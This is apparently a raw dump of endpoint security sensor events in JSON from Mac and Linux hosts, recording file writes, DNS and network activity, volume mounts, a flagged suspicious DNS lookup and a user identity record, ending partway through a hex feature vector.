-{"event_simpleName":"JavaClassFileWritten","ContextTimeStamp":"1625677528.570","ConfigStateHash":"3090255842","ContextProcessId":"364783686797112486","ContextThreadId":"0","aip":"208.187.110.246","FileIdentifier":"04000001000000000000000000000000986b480e00000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"JavaClassFileWrittenMacV1","id":"ffffffff-1111-11eb-97c6-02fd02aca859","EffectiveTransmissionClass":"2","aid":"ffffffff083845f68a7de3d95cb34361","timestamp":"1625677528717","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user2/shopper-one/tooling/teams-plugin/build/classes/kotlin/main/com/instacart/shopper/tooling/TeamsPlugin$apply$$inlined$configure$1.class"} -{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkConnectIP4","ContextTimeStamp":"1625677512.700","ConfigStateHash":"1620585913","ConnectionFlags":"0","ContextProcessId":"364796317497854624","RemotePort":"443","aip":"208.223.60.11","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"0","Entitlements":"15","name":"NetworkConnectIP4MacV10","id":"ffffffff-1111-11eb-9c94-0222a21bbb27","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff96f142f6b2475f3c584ddd80","RemoteAddressIP4":"208.208.21.205","ConnectionDirection":"0","InContext":"0","timestamp":"1625677512892","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"DnsRequest","ContextTimeStamp":"1625677475.806","ConfigStateHash":"1620585913","ContextProcessId":"364977197365370629","DomainName":"jss.dom1.com","ContextThreadId":"0","aip":"208.198.160.35","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"DnsRequestMacV1","id":"ffffffff-1111-11eb-9644-060415b1fd87","EffectiveTransmissionClass":"2","aid":"ffffffff7ecf4e61bba14ca5ac5d17b1","timestamp":"1625677476111","cid":"ffffffff15754bcfb5f9152ec7ac90ac","RequestType":"28"} -{"event_simpleName":"NewScriptWritten","ContextTimeStamp":"1625677504.770","ConfigStateHash":"1620585913","ContextProcessId":"365053504406857894","Size":"0","ContextThreadId":"0","aip":"208.180.129.90","SHA256HashData":"2d9a331f045a9c6b13d45eabe948b5c7dfdc25e1251bff6756fa306581087da9","FileIdentifier":"05000001000000000000000000000000b588050000000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NewScriptWrittenMacV2","id":"ffffffff-1111-11eb-b3de-06a53f021cc9","EffectiveTransmissionClass":"2","aid":"ffffffffbea440b9aad8b5bf222d303f","timestamp":"1625677540055","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Applications/BitBar/countdown_timer.1s.py"} -{"InterfaceIndex":"186","ConfigBuild":"1007.8.0011611.1","event_simpleName":"LocalIpAddressRemovedIP6","event_platform":"Lin","LocalAddressIP6":"ff88:1:1:ffff:440a:57ff:fe3a:8abc","ConfigStateHash":"1156120155","name":"LocalIpAddressRemovedIP6LinV1","aip":"208.203.151.21","id":"ffffffff-1111-11eb-b3c1-02ff598b7945","aid":"ffffffffbfbf4ff5aa56a26ad3c1a942","timestamp":"1625677526386","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"DirectoryCreate","ContextTimeStamp":"1625677499.994","GID":"0","ConfigStateHash":"3090255842","ContextProcessId":"365053555029062046","ContextThreadId":"0","aip":"208.130.71.241","Flags":"0","ConfigBuild":"1007.4.0013701.1","UID":"0","event_platform":"Mac","UnixMode":"0","Entitlements":"15","name":"DirectoryCreateMacV1","id":"ffffffff-1111-11eb-92d2-0286f570f8e1","VnodeType":"2","EffectiveTransmissionClass":"2","aid":"ffffffff24db47799d1a85aae61dc7bc","TargetDirectoryName":"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871","timestamp":"1625677500089","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871"} -{"LocalAddressIP4":"208.210.109.249","event_simpleName":"NetworkCloseIP4","ContextTimeStamp":"1625677517.658","ConfigStateHash":"1479784503","ConnectionFlags":"0","ContextProcessId":"84424232977619","RemotePort":"443","aip":"208.233.129.250","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"40394","Entitlements":"15","name":"NetworkCloseIP4LinV6","id":"ffffffff-1111-11eb-9015-02e89cda7d5f","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff58de4e748d9f64c85a9b49e6","RemoteAddressIP4":"208.216.236.59","ConnectionDirection":"2","InContext":"0","timestamp":"1625677517986","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"VolumeMediaName":"AppleAPFSMedia","VolumeDeviceProtocol":"PCI-Express","VolumeDeviceVendor":"","ContextThreadId":"0","VolumeMediaContent":"41504653-0000-11AA-AA11-00306543ECAC","VolumeMediaEjectable":"0","aip":"208.93.153.49","VolumeAppearanceTime":"1625677422.647","VolumeDeviceModel":"APPLE SSD SM0256L","VolumeMediaBSDName":"disk1s3","VolumeMountPoint":"/Volumes/Recovery","event_platform":"Mac","VolumeType":"APFS","VolumeMediaRemovable":"0","VolumeMediaBSDUnit":"1","VolumeFileSystemDriver":"apfs","id":"ffffffff-1111-11eb-956a-02748d01bd3d","VolumeMediaSize":"250685575168","EffectiveTransmissionClass":"2","VolumeBusName":"IONVMeController","timestamp":"1625677496804","VolumeMediaBSDMinor":"8","VolumeMediaWritable":"1","event_simpleName":"FsVolumeMounted","VolumeDevicePath":"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP01@1C/IOPP/SSD0@0/IONVMeController/IONVMeBlockStorageDevice@1","VolumeName":"Recovery","ContextTimeStamp":"1625677496.750","VolumeSectorSize":"4096","ConfigStateHash":"3090255842","ContextProcessId":"365053546767850587","VolumeBusPath":"IODeviceTree:/PCI0@0/RP01@1C/SSD0@0/IONVMeController","VolumeDeviceInternal":"1","ConfigBuild":"1007.4.0013701.1","VolumeUUID":"85400FAD-01F9-0442-8C5D-441F365D4909","VolumeDeviceRevision":"CXS4LA0Q","Entitlements":"15","name":"FsVolumeMountedMacV1","VolumeMediaBSDMajor":"1","VolumeMediaPath":"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP01@1C/IOPP/SSD0@0/IONVMeController/IONVMeBlockStorageDevice@1/IOBlockStorageDriver/APPLE SSD SM0256L Media/IOGUIDPartitionScheme/NoName@2/AppleAPFSContainerScheme/AppleAPFSMedia/AppleAPFSContainer/Recovery@3","aid":"ffffffff8eca418b7a861be9c5f7de1d","VolumeMediaUUID":"AD0F4085-F901-4204-8C5D-441F365D4909","VolumeMediaWhole":"0","cid":"ffffffff15754bcfb5f9152ec7ac90ac","VolumeIsNetwork":"0"} -{"LocalAddressIP4":"208.30.117.28","event_simpleName":"LocalIpAddressIP4","ConfigStateHash":"1156120155","CreationTimeStamp":"1625677513.841","aip":"208.233.54.217","PhysicalAddress":"0e-d6-ff-ff-ff-63","InterfaceAlias":"eth0","InterfaceIndex":"2","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","InterfaceType":"1","name":"LocalIpAddressIP4LinV1","id":"ffffffff-1111-11eb-9c94-0222a21bbb27","PhysicalAddressLength":"6","aid":"ffffffff190e436aaebc3892bcda5beb","timestamp":"1625677514374","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"LocalIpAddressRemovedIP6","LocalAddressIP6":"ff88:1:1:ffff:442a:7bff:fe75:9ed","ConfigStateHash":"3967242894","aip":"208.165.30.176","InterfaceIndex":"8","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","NetLuidIndex":"0","Entitlements":"15","name":"LocalIpAddressRemovedIP6MacV1","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","timestamp":"1625677480056","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"OutOctets":"0","CreationTimeStamp":"","aip":"208.176.144.39","OutMulticastPkts":"0","InErrors":"0","InterfaceAlias":"llw0","InDiscards":"0","InterfaceIndex":"8","event_platform":"Mac","InterfaceType":"6","id":"ffffffff-1111-11eb-b88d-06b7cb0d7bd7","PhysicalAddressLength":"6","InUcastPkts":"0","EffectiveTransmissionClass":"2","timestamp":"1625677521723","event_simpleName":"LocalIpAddressIP6","LocalAddressIP6":"ff88:1:1:ffff:c027:b0ff:fe27:830f","ConfigStateHash":"1620585913","PhysicalAddress":"c2-27-b0-27-83-0f","OutErrors":"0","InUnknownProtos":"0","OutUcastPkts":"0","InMulticastPkts":"0","ConfigBuild":"1007.4.0013701.1","InOctets":"0","NetLuidIndex":"0","Entitlements":"15","name":"LocalIpAddressIP6MacV1","aid":"ffffffff0ad7494e8e817b3903f4eebb","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkListenIP4","ContextTimeStamp":"1625677507.037","ConfigStateHash":"3090255842","ConnectionFlags":"0","ContextProcessId":"364432308748445743","RemotePort":"0","aip":"208.98.120.25","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"50647","Entitlements":"15","name":"NetworkListenIP4MacV10","id":"ffffffff-1111-11eb-8b36-06a8af5164a9","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff23d24c4193ffa6f270775ee5","RemoteAddressIP4":"0.0.0.0","ConnectionDirection":"2","InContext":"0","timestamp":"1625677507086","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"ExecutableDeleted","ContextTimeStamp":"1625677536.729","ConfigStateHash":"3090255842","ContextProcessId":"364994904864288322","ContextThreadId":"0","aip":"208.31.216.39","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ExecutableDeletedMacV1","id":"ffffffff-1111-11eb-8ca0-0231588e8cbb","EffectiveTransmissionClass":"2","aid":"ffffffffa7bf46da689501ce58bd6987","timestamp":"1625677536784","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user3/Library/Caches/com.tinyspeck.slackmacgap.ShipIt/update.FXKsmFO/Slack.app/Contents/Frameworks/Squirrel.framework/Versions/A/Resources/ShipIt"} -{"event_simpleName":"GzipFileWritten","ContextTimeStamp":"1625677504.542","ConfigStateHash":"3090255842","ContextProcessId":"362897421906895953","ContextThreadId":"0","aip":"208.188.8.87","FileIdentifier":"04000001000000000000000000000000501f510700000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"GzipFileWrittenMacV1","id":"ffffffff-1111-11eb-9320-06d410e6f705","EffectiveTransmissionClass":"2","aid":"fffffffffc2c4e4fa9c08e1a8388e5f9","timestamp":"1625677504614","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/db/powerlog/Library/BatteryLife/Archives/powerlog_2021-07-05_CC5F9FC1.PLSQL.gz"} -{"event_simpleName":"IOServiceRegister","ContextTimeStamp":"1625622770.595","ConfigStateHash":"3967242894","aip":"208.165.30.176","IOServiceClass":"IOUSBDevice:IOUSBNub:IOService:IORegistryEntry:OSObject","ConfigBuild":"1007.4.0013701.1","IOServicePath":"IOService:/IOResources/AppleUSBHostResources/AppleUSBLegacyRoot/AppleUSBVHCIBCE@80000000/Touch Bar Backlight@80700000","event_platform":"Mac","IOServiceProperties":"","Entitlements":"15","name":"IOServiceRegisterMacV1","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","IOServiceName":"Touch Bar Backlight","timestamp":"1625677480056","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"PtyCreated","ContextTimeStamp":"1625622602.031","ConfigStateHash":"3967242894","ContextProcessId":"364938416497226937","DeviceId":"251658248","ContextThreadId":"0","aip":"208.165.30.176","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"PtyCreatedMacV1","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","timestamp":"1625677478739","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"LocalAddressIP4":"208.27.233.142","event_simpleName":"LocalIpAddressRemovedIP4","ConfigStateHash":"1803419442","aip":"208.69.76.234","InterfaceIndex":"18","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","NetLuidIndex":"2","Entitlements":"15","name":"LocalIpAddressRemovedIP4MacV1","id":"ffffffff-1111-11eb-b7b7-066cc89bcebf","EffectiveTransmissionClass":"2","aid":"ffffffff5ae3449ab33a1809fe6c5ce2","timestamp":"1625677475967","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"NetworkCloseIP6","ContextTimeStamp":"1625677474.875","LocalAddressIP6":"0:0:0:0:0:0:0:1","RemoteAddressIP6":"0:0:0:0:0:0:0:1","ConfigStateHash":"1701000200","ConnectionFlags":"0","ContextProcessId":"12241681491990","RemotePort":"9","aip":"208.144.51.215","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"59999","Entitlements":"15","name":"NetworkCloseIP6LinV6","id":"ffffffff-1111-11eb-8130-02cde7751097","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff335f47ca89cad6a19f203bbd","ConnectionDirection":"2","InContext":"0","timestamp":"1625677475413","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"ConfigBuild":"1007.8.0011611.1","event_simpleName":"ConfigStateUpdate","event_platform":"Lin","ConfigStateHash":"1156120155","ConfigStateData":"0,0,1007.8.0011611.1|1,c,0|1,22,6|1,59,2d|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|","name":"ConfigStateUpdateLinV2","aip":"208.203.151.21","id":"ffffffff-1111-11eb-af89-06c111484f9f","aid":"ffffffffa74a4c89b9984a3a7124bb9d","timestamp":"1625677490580","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"SuspiciousDnsRequest","ContextTimeStamp":"1625677493.531","ConfigStateHash":"3090255842","ContextProcessId":"364839648316192383","DomainName":"hg-t2.dotice.me","ContextThreadId":"0","aip":"208.141.219.156","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"SuspiciousDnsRequestMacV1","id":"ffffffff-1111-11eb-a4a3-02cbdfb8f529","EffectiveTransmissionClass":"2","aid":"ffffffff0cd64fb78626ab1b6c65ac8c","timestamp":"1625677493756","cid":"ffffffff15754bcfb5f9152ec7ac90ac","RequestType":"1"} -{"Parameter2":"0","event_simpleName":"ErrorEvent","Parameter1":"18446744072635810412","Parameter3":"0","ConfigStateHash":"1156120155","aip":"208.233.54.217","Line":"96","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","ErrorStatus":"3759276032","name":"ErrorEventLinV1","id":"ffffffff-1111-11eb-bdd3-0681aa29cecb","Facility":"16778240","aid":"ffffffffabd047b1a86c1fcd8ef22b59","File":"0","timestamp":"1625677530922","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"ConfigStateUpdate","ConfigStateHash":"3090255842","ConfigStateData":"0,0,1007.4.0013701.1|1,2,1|1,4,a|1,6,0|1,8,46|1,a,1|1,c,0|1,17,1f|1,18,18|1,19,0|1,1e,407|1,21,3d2|1,27,1|1,53,18b|1,56,0|1,d0,16d|1,d1,0|1,d2,0|1,df,4c|1,e0,6|1,f6,1|1,1f5,1|1,1f7,1|1,1fd,1|1,200,0|2,0,138,a8000000032,140000000085,140000000153,18000000004c,18000000004f,180000000050,180000000051,180000000054,1800000000e1,1800000000e7,180000000144,18000000014e,18000000015a,18000000020e,180000000226,180000000227,180400000079,18040000009b,18040000009c,1804000000ff,180400000117,180400000118,180400000142,180400000163,180400000164,180400000166,180400000167,1804000001b2,1804000001f2,1804000001f3,180400000225,1804000002be,1804000002bf,1804000002ca,1804000002cb,1808000000c9,1808000000ee,1808000000fc,1808000000fd,1808000000fe,180c0000016b,180c0000016c,180c0000016d,180c0000016e,180c0000016f,180c00000170,180c000001b6,180c000001b7,180c000001b8,180c000001b9,180c000001f6,180c000001f7,180c000001f8,180c000002c2,180c000002c3,180c000002c4,180c000002ce,180c000002cf,180c000002d0,18100000011e,18100000011f,181000000120,181000000121,181000000122,181000000123,181000000124,181000000125,181000000126,181000000128,181000000169,18100000016a,181000000180,1810000001b1,1810000001c3,18100000021f,181000000220,18100000024e,18100000025b,181000000280,1810000002ad,1810000002d6,1810000002d7,1810000002f3,1c04000000a1,1c04000000a2,1c04000000a3,1c04000000a4,1c04000000a5,1c04000000a6,1c040000011a,1c040000011b,1c040000011c,1c0400000268,1c0400000269,1c040000026a,1c040000026c,1c040000026d,1c040000026e,1c0400000271,1c0400000272,1c0400000273,1c0400000275,1c0400000276,1c0400000277,1c040000028f,1c0400000290,1c0400000291,1c0400000293,1c0400000294,1c0400000295,1c0400000297,1c0400000298,1c0400000299,1c040000029b,1c040000029c,1c040000029d,1c040000029f,1c04000002a0|3,0,65|","aip":"208.24.60.146","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ConfigStateUpdateMacV2","id":"ffffffff-1111-11eb-8dc4-0234c12f9875","EffectiveTransmissionClass":"0","aid":"ffffffffa15a452190ae454f7d33e07e","timestamp":"1625677530590","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"KextLoad","ContextTimeStamp":"1625677509.064","ConfigStateHash":"1620585913","ContextProcessId":"364867547408058681","ContextThreadId":"0","aip":"208.131.106.21","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","BundleID":"com.apple.driver.AudioAUUC","Entitlements":"15","name":"KextLoadMacV1","id":"ffffffff-1111-11eb-a2ae-028f6bf89be7","EffectiveTransmissionClass":"2","aid":"ffffffffaa0e47a1b009aef151d6179d","timestamp":"1625677509069","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"ChannelVersion":"25","event_simpleName":"ChannelVersionRequired","ConfigStateHash":"3155796140","aip":"208.27.17.203","ChannelVersionRequired":"0","ChannelId":"20","ConfigBuild":"1007.8.0011110.1","event_platform":"Lin","name":"ChannelVersionRequiredLinV1","id":"ffffffff-1111-11eb-b411-06baeacb7a63","aid":"ffffffff67d54f7daf3d998ffc74d48e","timestamp":"1625677507901","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"ProcessRollup2Stats","ConfigStateHash":"2037712541","Timeout":"60","ParentProcessId":"0","aip":"208.203.151.21","SuppressType":"3","SHA256HashData":"64e48365207d0c19008ba7d53d75c0de3fcd5a1590e4c40fc69c677663fedc20","ProcessCount":"60","BoundedCount":"57","ConfigBuild":"1007.8.0011308.1","UID":"115","event_platform":"Lin","CommandLine":"sh -c \"/usr/lib/erlang/erts-11.1.3/bin/epmd\" -daemon","Entitlements":"15","name":"ProcessRollup2StatsLinV3","id":"ffffffff-1111-11eb-b34e-063f4cefccb3","EffectiveTransmissionClass":"2","aid":"ffffffffe22549479fbe8293b6747a68","timestamp":"1625677511754","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"UserIdentity","LoginSessionId":"1138166333440","AuthenticationUuidAsString":"FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000109","UserName":"user1","ConfigStateHash":"3967242894","aip":"208.165.30.176","AuthenticationId":"265","UserPrincipal":"user1@dom1","UserSid":"S-1-5-21-3852557355-3178143607-2040168074-1530","ConfigBuild":"1007.4.0013701.1","UID":"265","event_platform":"Mac","Entitlements":"15","name":"UserIdentityMacV4","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","AuthenticationUuid":"FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000109","timestamp":"1625677478122","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"FeatureVector":"000000527b2276223a22312e30222c226e223a352c226c223a3235362c2265223a7b2261223a5b31363737373232332c31363737373232332c31363737373232332c31363737373232332c31363737373232335d7d7d3f48793e3f6837b53f276c8b3ef8d4fe3f036e2f3fdb404f3e361134404d8c7e3df27bb33ef837b53faa57a83e752546402e6b513eb8e2193f5e63203e1446743f295e9e401fb7e93fe010623f90be0e3f6f837b3e7333333f3951833f33afb83e3f62b73e1893753f1b851f3ea752543e9333333ed446743f045a1d40889ba64065d2f2ad9a1b883f573eab3dd773193ed254613f3f3b643eedab9f3f579a6b4082b5dd3f92d42c3e8809d54040fcf83f90a71e40d717593e832ca53e19e83e3b4b295f3f64c2f83f8a9d1f3f27fcb93f088ce73e7333333de944673e81d7dc3f2db22d3e90cb293e2ca57a3e22b6ae3e843fe63f44fdf43f0573eb3ecbc6a83c648e8a3ceb1c433d16c6153c0d4fdf3d0529353e08ce703c2d81ae3f0809d53b69a2c63b7b43d93ded91683ba90cd43e2f9db23b6e28673d646499bb84406c3c0bd6623ea809d53edfb15b3dcc73acbc188d2a3c20cae63d390eaa3d148fda398cfb263b872b023d4d2b2c3a19c60fbc58ec963af9b13139f75bed3f687fcc3f105bc0ae9de3cf3cfb15b53a5dcccfbc2398203c9f40a3ba91e2153d0ec95c3f7e00d23dd048173c13b7d83f3404ea3ef06f69400392643c4dc8753b1f9485bb875d573cdebd903e1a9fbe3be83a113b1528f23c9279143c40053e3b62089e3d06ec183d16e58aba9c7ffe3b30c0273c3cbe623cc9eecc3b1e55c1ba25558f35192b55bcba493d357b1f123422c77e35700fd4349540073385f5c53562b199363180c1bbb5f5f133702cb134553ec134453f1234dfedcabba8e2e3bc4df26734da8f6636e51c133592f7ea34116278be173eabbc11ea79bbb3d4ae3574e4c733a4bbc53046530d34fd74ee330432f8bcf212d7bbaf3e47bc46690534a8a19335420670af1ab38734cdff54338e0e59bd23ad1934a8bd10bd2bb44e3433be90390220d73590265c3481ec3abb7701543b3e1eb437841ede333ede4c31d582ecbc195ee13510b6ab35ab6563b85ae696bcc582563510d9083490265c319cda2abc8327673428415ebba593a3347763df2f713b9cbd14a4d33486ea69bca3ec033d58ec963dc523f63dba7daa3cab9f563d5c67e03e8425af3cdaf8df3f47381d3bab606b3d174e663e6b1c433c4710cb3f04d0143c9691a73e0a233a3bde2ac33d0240b83ee339c13f139c0f3e2fec573df34d6a3d00e6b03df1a9fc3d9fb3fa3b6629953c4100e73d89fe873c0811b23d2d2dcb3ce5de163d0a1dfc3fac816f3f5096bc2e0d65af3df559b43b38ae323cf6555c3d93c3613d78a0903de872b03eb439583e27ef9e3c1689443f7c8b443eb06f694010ce703cff822c3c2d81ae3b0e68e43db5e2043e6b367a3d355ef23d1b089a3c5898b33bd373b03c41d29e3decbfb13d8a0e413bd9dfdb3c2dab9f3d1fddec3dcdd2f23cd10f523ce9ccb83f4b2fec3f7119ce3f276c8b3ee831273f036e2f3fe58adb3e361134404d8c7e3df972473ef837b53faab3683e7f1412402f34d73eb8e2193f62339c3e1446743f2041894013e0df3fe010623f90be0e3f6f837b3e7333333f449ba63f30a3d73e3f62b73e1893753f1b851f3ee240b83e9333333ed446743f03d07d40889ba64065d2f2ad8f49d23f4fd8ae3dd14e3c3edde69b3f3e147b3ee5bc023f579a6b409780343f92d42c3e8809d540435f703f90a71e40d717593e832ca53e19b3d03cc13fd13f6374bc3f8a9d1f3f27fcb93f1cd35b3e7333333de388663e884b5e3f29999a3e90cb293e2305533e2147ae3e843fe63f4d013b3f056d5d3ebe28243c6703b03cf084623d14a4d33c093b7e3d05a7093e087fcc3c304ab63f08c7e33b6ad0c43b8893b83dec22683ba8e2e33e2c56d63b6cd8dc3d637de9bb849cb23c08e79b3ea6dc5d3ee00d1b3dcb923abc1fd36f3c1cf56f3d385c683d134acb398c098e3b872b023d4e075f3a108bd4bc564d7f3b029cfe399cd0863f6958103f10b780ae9e16793cf601793a58523cbc231e7e3c9eecc0ba8398a63d0fba883f7d63883dd254613c14c4483f349ba63ef0b0f24003aa263c49afe23b23d70abb875d573cde3fbc3e1a9fbe3bebcc6c3b19d0203c92641b3c402f303b62d1f23d0366513d1797ccba9f40a33b32c83f3c39a1773ccfe9b83b2276b8ba786f1235192b55bcb890d63573a8ab34a531f734c11ccb3495400732a151a8369df96936179953bbbc1f00340207b734553ec134b523e7352bd356bba8e2e3bc4df26733a7cdeb36e51c1335421b0e3515c299be173eabbc11e647bbb3d4ae328448f533aa5c213046530d357f25dd330432f8bcf290acbbae9ee4bc4669053496f7d534ede333af1ab38733a03ec7346522f2bd23ad19353fd9cfbd2bb44e3392336039250bbe34bb34f73618f0ecbb7701543c50e560356884d0330f9fab31d582ecbc19f5e03510b6ab34e35d66b85ac660bcc582563510d9083490265c3399a707bc84a0e43474d02abba593a3342f209630b98ae7bd11fb4033605e7dbc9e59f33d5f11733dc922533db943183ca5a46a3d5b42463e83bcd33cdd2f1b3f47fcb93bae3a3b3d1ceaf23e6978d53c4836653f03a29c3c9afe1e3e096bba3bde76423cfd4bf13ee1e4f73f1418933e2ee6323df1a9fc3cfe1da83df0d8453d9e7ea63b69f6a93c4083123d8a7c5b3c0266773d2e147b3ce978d53d08ce703facf41f3f510cb32e0d9dfa3df2b0213b2bd5dc3cf77af63d94ee393d782d383de978d53eb404ea3e288ce73c2209ab3f7c91d13eb0d8454010e2193cfc65413c2e53653b0ede553db674d13e6ae7d53d361bb03d1c23b83c579d0a3bd3176a3c4447c33dea161e3d8a67623bd477bc3c2f4f0e3d1e6eeb3dd07c853cd4e8fb3cded2893f42de013f6d4fdf3f276c8b3ee1e4f73f036e2f3fe58adb3e361134404d8c7e3df837b53ef18fc53faa57a83e781d7e402d53263eb8e2193f62339c3e1b089a3f204189400eb9f53fe010623f9395813f6a233a3e81ff2e3f41a9fc3f3013a93e2666663e17dbf53f1b851f3ec666663e9333333ed446743f0e560440889ba64065d2f2ad9a1b883f573eab3dd7a7873edde69b3f3f3b643eed42c43f6a30554087f62b3f92d42c3e83958140435f703f90a71e40d717593e832ca53e19ce073cd0917d3f6374bc3f8a9d1f3f26e9793f088ce73e7333333df34d6a3e8710cb3f34f7663ea20c4a3e1a02753e23bcd33e843fe63f3a36e33f0573eb3ec84b5e3c6685db3cef0ae53d17acc53c0b32cf3d05681f3e0831273c2ff6d33f0a29c73b6a9e6f3b88c60d3deecbfb3baa53fc3e2d91683b6c636b3d66d9bebb8533b13c0a0d353ea91d153ee275253dcc9d9dbc159e623c1d27c43d3ad18d3d145b6c3982b47b3b88051d3d4fe9b83a12e7cfbc579d0a3af0a5f0390a9f2b3f69db233f10b780ae9e5a073cfc26573a5a6b1bbc247ed03c9d7343ba9bb6aa3d0f66a53f7d49523dd35a863c151c5c3f35b5743ef1d14e40047f243c4d9e843b24095fbb87b99d3cdd82fd3e1c28f63beeae9f3b14812c3c91a75d3c40ad043b613f4b3d033c603d195033ba9d8c6d3b307d0b3c3d12453cd234ec3b25375dba904f6e35181195bcba493d35a2674934a531f7352bda363522229033be54dc337b157336151dabbbb5f5f1340207b7345d30d93421b49d34c2b91cbba8e2e3bc4df26733a7cdeb369116e13592f7ea34116278be173eabbc11e647bbb3d4ae328448f533b7f4153046530d359e3e2233d006d8bcf2cf96bbad9ad8bc466905351da01436249e38af17834033a03ec7346522f2bd1ddc1e35d36497bd2bb44e33bf0a47390220d734c2822235531fdebb73ba773c1888f8356884d0330f9fab31d533c2bc195ee135adf23935ab6563b85b06ccbcc84b5e3510d9083490265c33e590e6bc81450f33ce498bbba593a334d1f8602f713b9cbd1930be33605e7dbca3ec033d5d249e3dc85b183dbc115e3ca858793d5c33723e83afb83cdcc63f3f4916873bab47413d1cb6853e6b9f563c49320e3f03eab33c9afe1e3e0aa64c3bdfd6953cfac1d33ee3e4263f14af4f3e2f69443df3b6463cfeda663df2b0213d9faebc3b50678c3c4250723d8c00543c0151a43d2d0e563ce4f7663d0701113fad2bd43f5075f72e0e19d33df5f6fd3b2eb80f3cf487fd3d92e72e3d7842313de944673eb50b0f3e295e9e3c1fd36f3f7d6a163eb15b57401159b43d000a7c3c2d2dcb3b0ecd8e3db4e11e3e6c3c9f3d3adc0a3d1bb0603c52dcb13bd338f83c4100e73de9e1b13d8b53503bd6ece13c2cd9e83d201cd63dd1b7173cda12303cdc725c3f48793e3f6ded293f276c8b3f036e2f3f036e2f3fea0f913e361134404d8c7e3e0189373ef837b53fabc3613e7f62b7403012063eb79a6b3f5e63203e0d4fdf3f204189400de9e23fe010623f90be0e3f6a233a3e81ff2e3f3951833f30902e3e4275253e18793e3f1b851f3ee0f9093e9333333ed446743f045a1d40889ba64065d2f2ad9d19253f573eab3dc692f73ece21963f3f3b643eee2eb23f579a6b407e76c93f92d42c3e83958140435f703f90a71e40d717593e832ca53e25aee63cb7e9103f64c2f83f8a9d1f3f27fcb93f06a7f03e676c8b3de147ae3e884b5e3f27bb303e90cb293e3295ea3e21e4f73e81205c3f3fec573f0573eb3ebec56d3c633eff3cf1800a3d1389b53c0ac1903d0587943e06dc5d3c2efb2b3f095e9e3b67ddca3b80303c3dec8b443ba782903e30068e3b6bcc6c3d619b91bb836eb53c0bf7f03ea60aa63ee00d1b3dcc447cbc28c1553c1d55e73d36e2eb3d132b56399063903b8776813d4d7f0f3a15a1bdbc55cfab3b06f04a39c25a833f68f5c33f107c85ae9e10d83cf9335d3a594a8abc2276b83c9f